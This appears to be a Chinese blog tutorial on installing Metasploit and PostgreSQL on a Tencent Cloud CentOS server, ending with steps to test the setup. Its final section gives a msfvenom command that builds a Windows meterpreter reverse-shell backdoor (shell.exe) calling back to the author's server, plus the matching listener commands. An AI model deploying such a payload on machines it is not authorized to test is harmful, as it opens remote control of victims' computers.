腾讯云服务器centos7.9搭建msf以及利用过程

已于 2022-07-08 17:46:26 修改
阅读量3.6k 收藏 17
点赞数 3
分类专栏: 环境搭建 文章标签: web安全 服务器 postgresql
于 2022-07-08 17:42:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/125681202
版权

一路踩坑过来,记录一下,愿世间不再有坑呜呜呜。

一、安装msf

在 /opt 目录下输入

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

安装好之后输入msfconsole,查看是否安装成功

二、安装Postgresql数据库

1.卸载旧版本Postgresql

虽然centos系统自带Postgresql数据库但是不能直接用(我也不知道为什么),所以需要先卸载。

yum remove postgresql*

2.安装新版Postgresql

(1)安装rpm文件

yum install https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm

(2)安装客户端(一路默认y安装就行)

yum install postgresql10       

(3)安装服务端(一路默认y安装就行)

yum install postgresql10-server 

(4)初始化

/usr/pgsql-10/bin/postgresql-10-setup initdb     

(5)设置自动启动并且启动postgresql服务

systemctl enable postgresql-10

systemctl start postgresql-10

三、msf连接Postgresql

1.不能以root用户初始化数据库,创建一个用户msf对其初始化

(1)创建用户msf

useradd msf

(2)切换msf用户

su msf

(3)进入msf的bin目录

cd /opt/metasploit-framework/bin/

(4)初始化

./msfdb init

2.切换到root,用msf用户的数据库配置覆盖原配置

(1)切换root

su root

(2)覆盖原配置文件

cp /home/msf/.msf4/database.yml /opt/metasploit-framework/embedded/framework/config/

3.测试是否连接正常

进入msf,输入 db_status

四、msf利用

另外准备一台靶机,或者本机测试都可以

1.服务器开启端口

这里非常重要!腾讯云服务器除了在控制台需要开启端口外,宝塔也需要开!之前一直连不上,搞了老半天,结果是宝塔没开放端口。

 

2.msfvenonm生成windows后门木马

LHOST那里输入自己的服务器的公网IP,LPORT那里就输入自己在服务器开放的端口

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<公网IP> LPORT=<自己开放的端口>  -f  exe > shell.exe

这里呢会在当前目录得到一个shell.exe文件,如果只有250b的大小的话就是有问题的,需要重新检查一下语句

3.设置监听

进入到msf,输入以下语句:

use exploit/multi/handler  

set payload windows/x64/meterpreter/reverse_tcp 
set lhost  <公网IP>               #或者0.0.0.0
set lport <开放的端口>   
exploit                               #run也可以                       

4.测试

将生成的shell.exe文件上传到靶机或本机上,点击运行,服务器上可以看到监听成功

参考文章:

centos搭建msf_MH cloud的博客-CSDN博客_centos安装msf

weixin_48799157
关注
  • 3
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
Centos7安装Msf
yuhongkui的专栏
08-29 854
Centos 7 安装msf框架
Centos7离线安装metasploit详细教程.pdf
09-05
centos7离线安装metasploit教程,最近需在内网服务器搭建安全工具环境,苦于内网服务器无法访问互联网,需要很多依赖包比较麻烦,尤其metasploit无互联网安装特别麻烦,而且网上metasploit的安装教程均是在线一键安装教程,对于无法访问互联网的服务器进行安装均无效,经过多次测试终于完成离线安装,先整理了下安装过程步骤。
服务器CentOS7中安装msf工具
剁椒鱼头没剁椒的博客
03-25 3098
在日常使用中,模拟攻击以及测试的时候都是直接使用本地虚拟机kali中的msf工具,但是在一些测试环境中需要使用到公网,但是目前的所有的云服务商,并不会提供kali镜像,那么当使用到msf工具的时候就需要自行安装了。网上的很多关于centos安装msf工具的教程,多多少少都存在一些问题,所以,这里就总结一篇关于centos7中安装msf工具的文章。一台云服务器centos 7.X版本Metasploit(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
Linux(CentOS)安装msf
weixin_48878440的博客
09-15 987
linux安装msf 安装metasploit centos安装msf 漏洞处理 信息安全
linux安装 msf,centos安装msf
weixin_39876650的博客
05-27 850
centos安装msf的一个笔记以前都是使用kali的msf,没有自己安装过,现在我使用centos系统,了解一些安装过程。百度了一下安装的教程,跟着操作了一下。有一些坑。第一步、下载包wget https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run给予这个包执行的权限:chm...
linux系统安装msf过程详解
01-09
还是自己写下安装过程吧! 我的服务器系统是 Aliyun linux 1、下载安装 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall 可能报错:Couldn’t open file /etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit 是因为安装库的
centos搭建msf
热门推荐
m0_52400001的博客
03-25 1万+
由于msf一直在虚拟机里面用的时候有些麻烦,所以这里把他搭建服务器上,网上有很多教程乱七八糟的,这是我一步一步实验出来的,完美兼容! 1.安装msf 官方有提供一键安装脚本,如下: curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall &&amp..
Centos7搭建MSF6(公网服务器搭建msf
希望我的博客,能帮上你解决学习中工作中所遇到的问题
03-15 1813
每次需要用msf测试的时候,都需要用frp把msf穿透出来,麻烦的很,索性直接把他搭建到公网服务器上,实验机为centos,网上教程非常杂乱,中途遇到很多问题,花费了大量时间解决了遇到的问题,文章非常详细,并记录下来,照着文章一步步操作,可以完美搭建
Centos8安装msf
weixin_45632448的博客
03-25 2595
环境: centos8 腾讯云 操作步骤: 下载erb文件,国内下载不了,需要借助第三方的下载平台: https://ghproxy.com/ 具体流程: 访问 https://ghproxy.com/ 在输入框输入erb文件的下载地址,并点击下载 https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb
Centos 7 安装msf
qq_38611079的博客
09-17 4382
https://blog.csdn.net/qq_21310689/article/details/85594699
msfconsole
12-12
kail、ubantu的msfconsole平台的用法,如search导入,use调用等等
centos 7.9服务器 离线 搭建svn服务器
10-02
centos 7.9服务器 离线 搭建svn服务器 ,该文章适用于 开发人员 实施人员 项目经理用于项目文档管理 代码管理,而不指定如何在centos7.9环境下离线搭建svn服务器,因为大多数的网站只是介绍yum install 的方式,但是...
Centos7.9搭建SS5代理服务器
03-14
Centos7.9搭建SS5代理服务器
CentOS7.9搭建PXE+Kickstart无人值守服务器.pdf
10-01
CentOS7.9搭建PXE+Kickstart无人值守服务器.pdf
Dell服务器安装CentOS7.9完整过程
最新发布
04-29
文档描述在Dell服务器安装CentOS7.9的完整过程,文档步骤如下: U盘制作 1 一、 选择启动项 1 二、 进入安装及注意项 3 三、 CentOS安装详细截图 6 4.1 选择安装CentOS 7 7 4.2 选择中文语言 7 4.3 选择要安装的...
qcow2格式,openstack常用的 centos7.9-2211镜像
04-20
qcow2格式,openstack, centos7.9-2211,centos7.9镜像,云镜像,通用cloud-image,和阿里云centos镜像类似,是vda整合系统,可以用 resize 热扩容硬盘和文件系统。
【网络安全安全事件管理处置 — 安全事件处置思路指导
享你所想
04-26 688
一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集 二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复 三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复 四、处理复合型安全事件 1.建议
网络安全(黑客技术)—2024自学手册
TDJYGC的博客
04-20 1154
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
阿里云服务器centos7.9
09-18
阿里云提供了多种购买服务器的方式,你可以在阿里云官网进行购买。首先,你需要在https://www.aliyun.com/进行登录或注册,然后选择购买服务器。对于有基础的用户,建议自选配置云服务器。如果你对具体配置技巧不清楚,可以咨询阿里云客服获取帮助。此外,如果你是学生,还可以考虑阿里云的云翼计划购买。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值